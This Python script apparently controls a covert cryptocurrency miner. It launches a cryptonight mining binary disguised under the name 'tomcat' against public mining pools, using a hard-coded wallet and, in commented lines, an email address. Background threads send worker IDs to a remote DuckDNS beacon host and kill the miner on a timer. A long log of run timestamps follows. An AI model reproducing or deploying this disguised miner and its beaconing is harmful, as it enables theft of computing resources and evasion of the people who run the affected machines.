import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:06.873831
#2018-02-17 16:28:02.167392
#2018-02-17 18:16:05.972788
#2018-02-17 20:03:06.059570
#2018-02-17 21:51:06.390758
#2018-02-17 23:36:03.383517
#2018-02-18 01:25:01.471726
#2018-02-18 03:12:05.573264
#2018-02-18 05:01:01.689697
#2018-02-18 06:53:04.927354
#2018-02-18 08:41:01.991071
#2018-02-18 10:27:04.270494
#2018-02-18 12:13:02.146828
#2018-02-18 13:59:07.153345
#2018-02-18 15:49:04.071703
#2018-02-18 17:38:07.414340
#2018-02-18 19:26:06.148311
#2018-02-18 21:12:03.244703
#2018-02-18 22:59:04.966795
#2018-02-19 00:46:07.391621
#2018-02-19 02:33:05.708713
#2018-02-19 04:19:04.408477
#2018-02-19 06:04:05.140861
#2018-02-19 07:52:08.412591
#2018-02-19 09:42:07.251475
#2018-02-19 11:32:02.919494
#2018-02-19 13:19:02.162551
#2018-02-19 15:07:02.059979
#2018-02-19 16:54:12.304913
#2018-02-19 18:41:09.669648
#2018-02-19 20:27:05.317485
#2018-02-19 22:15:04.313232
#2018-02-20 00:01:07.945205
#2018-02-20 01:49:05.414881
#2018-02-20 03:38:05.282521
#2018-02-20 05:23:01.727512
#2018-02-20 07:07:04.145410
#2018-02-20 08:52:05.688052
#2018-02-20 10:36:08.918413
#2018-02-20 12:22:08.498949
#2018-02-20 14:10:08.966534
#2018-02-20 15:55:01.368952
#2018-02-20 17:42:01.940739
#2018-02-20 19:31:09.668578
#2018-02-20 21:19:07.722327
#2018-02-20 23:04:08.029184
#2018-02-21 00:50:04.042424
#2018-02-21 02:36:06.744134
#2018-02-21 04:24:05.898649
#2018-02-21 06:11:05.426679
#2018-02-21 07:56:02.254185
#2018-02-21 09:41:04.223238
#2018-02-21 11:32:07.828109
#2018-02-21 13:22:05.683715
#2018-02-21 15:08:07.271598
#2018-02-21 16:59:01.792683
#2018-02-21 18:48:06.044663
#2018-02-21 20:31:08.344884
#2018-02-21 22:16:08.228535
#2018-02-22 00:05:02.285026
#2018-02-22 01:54:04.438454
#2018-02-22 03:41:07.388176
#2018-02-22 05:28:05.410728
#2018-02-22 07:13:07.378162
#2018-02-22 09:01:03.757476
#2018-02-22 10:49:06.304351
#2018-02-22 12:36:09.260838
#2018-02-22 14:21:04.985938
#2018-02-22 16:08:11.432796
#2018-02-22 17:54:01.932557
#2018-02-22 19:42:06.731764
#2018-02-22 21:33:03.202598
#2018-02-22 23:20:05.048155
#2018-02-23 01:07:03.613100
#2018-02-23 02:53:04.353756
#2018-02-23 04:41:01.261985
#2018-02-23 06:26:05.868544
#2018-02-23 08:13:04.560114
#2018-02-23 10:28:07.116161
#2018-02-23 12:22:06.634598
#2018-02-23 14:11:07.031310
#2018-02-23 16:01:04.965786
#2018-02-23 17:46:02.148961
#2018-02-23 19:33:05.873196
#2018-02-23 21:16:02.008578
#2018-02-23 23:03:04.311390
#2018-02-24 00:52:04.087035
#2018-02-24 02:47:03.769411
#2018-02-24 05:29:03.938940
#2018-02-24 07:16:05.031930
#2018-02-24 09:05:05.610172
#2018-02-24 10:45:01.824877
#2018-02-24 12:26:06.703457
#2018-02-24 14:04:01.641916
#2018-02-24 15:40:08.697144
#2018-02-24 17:22:04.615873
#2018-02-24 18:54:06.188156
#2018-02-24 20:26:04.091688
#2018-02-24 21:59:05.173283
#2018-02-25 02:04:07.028967
#2018-02-25 05:52:07.762516
#2018-02-25 11:37:04.701103